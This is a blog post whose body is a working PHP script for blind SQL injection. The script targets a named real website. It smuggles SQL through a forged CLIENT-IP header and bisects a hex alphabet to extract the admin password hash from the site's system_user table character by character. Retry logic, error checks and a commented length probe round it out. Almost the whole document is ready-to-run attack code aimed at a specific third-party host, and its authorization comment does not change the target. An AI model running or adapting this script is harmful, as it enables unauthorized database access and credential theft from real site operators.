
二分法盲注实例

March 6, 2016 • Security

<?php

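// Bisection-based blind SQL injection driver (the original post's example).
// NOTE(review): this targets a hard-coded, named host. Run it only against a
// system you are explicitly authorized to test.

// Candidate alphabet for every extracted position. The value is read through
// HEX(), so only uppercase hex digits can occur. The alphabet MUST cover every
// possible character: the bisection below only ever asks "is it in the lower
// half?" and infers the upper half, so an uncovered character would otherwise
// be silently reported as the last candidate instead of detected.
//$sCharset = 'etaoinshrdlcumwfgypbvkjxqz@';
$sCharset = 'ABCDEF0123456789';

// Marker the oracle looks for in the response body. Per the original script,
// its presence means "condition false", its absence means "condition true".
$sErrorMarker = 'mysql_fetch_array';
// Bounded retries for one probe, so a transport failure (mycurl() returning
// false) is never mistaken for an oracle answer. In the original, a false
// response made strpos() report "marker absent" and the run drifted to $ch1
// for every position, producing a plausible-looking but wrong value.
$iMaxRetries = 3;

// Build the injected SQL fragment: "does HEX(password) of the admin row start
// with $prefix followed by one character of $set?". REGEXP receives $set as a
// bracket expression, so the alphabet must not contain regex metacharacters
// (hex digits are safe). The runtime string is kept byte-identical.
$buildPayload = function ($prefix, $set) {
    return 'or 1=(select case when (select hex(password) from phfirst.`system_user` where user=\'admin\')'
         . 'REGEXP \'^' . $prefix . '[' . $set . ']\''
         . 'THEN 1 ELSE 0 end) and 1=1';
};

// Ask the oracle once (with retries). Returns true when the marker is absent
// (condition held), false when it is present. A persistent transport failure
// aborts the run rather than corrupting every remaining position.
$probe = function ($payload) use ($sErrorMarker, $iMaxRetries) {
    $res = false;
    for ($try = 0; $try < $iMaxRetries && $res === false; ++$try) {
        $res = mycurl('http://www.phfirst.com.tw/mrtg.php', $payload);
    }
    if ($res === false) {
        fwrite(STDERR, PHP_EOL . 'request failed ' . $iMaxRetries . ' times; aborting' . PHP_EOL);
        exit(1);
    }
    return strpos($res, $sErrorMarker) === false;
};

// 32 positions are assumed (e.g. the hex encoding of a 16-byte digest). Confirm
// the real length first with the commented length probe below and adjust.
$result = '';
for ($i = 0; $i < 32; ++$i) {
    $ch = $sCharset;

    // Bisect the remaining alphabet: one request per halving, log2(|alphabet|)
    // requests per position.
    while (strlen($ch) > 1) {
        $half = intval(strlen($ch) / 2);
        $ch1 = substr($ch, 0, $half);
        $ch2 = substr($ch, $half);
        $ch = $probe($buildPayload($result, $ch1)) ? $ch1 : $ch2;
    }

    // One extra request confirms the survivor directly; this is the only way
    // to notice that the true character lies outside $sCharset.
    if (!$probe($buildPayload($result, $ch))) {
        fwrite(STDERR, PHP_EOL . "position $i: no character of the alphabet matched; extend \$sCharset" . PHP_EOL);
        exit(1);
    }

    $result .= $ch;
    echo "\rresult: " . $result;
}
echo PHP_EOL;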
 

/* Length probe (run this first): tells you how many positions the extraction loop above must cover
$payload= " And (select length(user()))=14 ";
    $contents= mycurl('http://www.phfirst.com.tw/mrtg.php',$payload);
echo    $contents;
*/
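/**
 * Issue one probe request and return the response body.
 *
 * The payload travels in the CLIENT-IP request header: the header value
 * closes an IP string literal with a quote, appends $str and terminates the
 * remainder of the server-side statement with a MySQL '#' comment (this is
 * the injection point the original post relies on).
 *
 * @param string $url Endpoint to request.
 * @param string $str SQL fragment injected after the closing quote.
 * @return string|false Response body on success; false when the transfer
 *         failed (timeout, proxy not listening, DNS error, ...). Callers must
 *         compare with === — a false return is NOT an oracle answer. The
 *         failure is also reported on STDERR so it is not lost silently.
 */
function mycurl($url, $str) {
    $curl = curl_init();
    curl_setopt_array($curl, array(
        CURLOPT_URL            => $url,
        CURLOPT_USERAGENT      => 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0',
        // Crafted header carrying the injected fragment.
        CURLOPT_HTTPHEADER     => array(
            'X-Requested-With: XMLHttpRequest',
            'CLIENT-IP: 201.56.23.45\'' . ' ' . $str . '#',
        ),
        // Every request goes through a local HTTP proxy (an intercepting
        // proxy on 8081); if nothing listens there, every request fails.
        CURLOPT_PROXY          => 'http://127.0.0.1:8081',
        //CURLOPT_PROXY        => 'socks5://127.0.0.1:1080',
        // Cache DNS answers for a day to avoid re-resolving on each probe.
        CURLOPT_DNS_CACHE_TIMEOUT => 86400,
        CURLOPT_RETURNTRANSFER => true,
        //CURLOPT_FOLLOWLOCATION => true,
        // NOTE(review): the total timeout (10s) is shorter than the connect
        // timeout (15s), so the connect limit never takes effect as written;
        // the effective bound on any request is 10s.
        CURLOPT_TIMEOUT        => 10,
        CURLOPT_CONNECTTIMEOUT => 15,
    ));

    $ret = curl_exec($curl);
    if ($ret === false) {
        // Surface the transport error; the caller only gets a bare false.
        fwrite(STDERR, 'curl error ' . curl_errno($curl) . ': ' . curl_error($curl) . PHP_EOL);
    }
    curl_close($curl);
    return $ret;
}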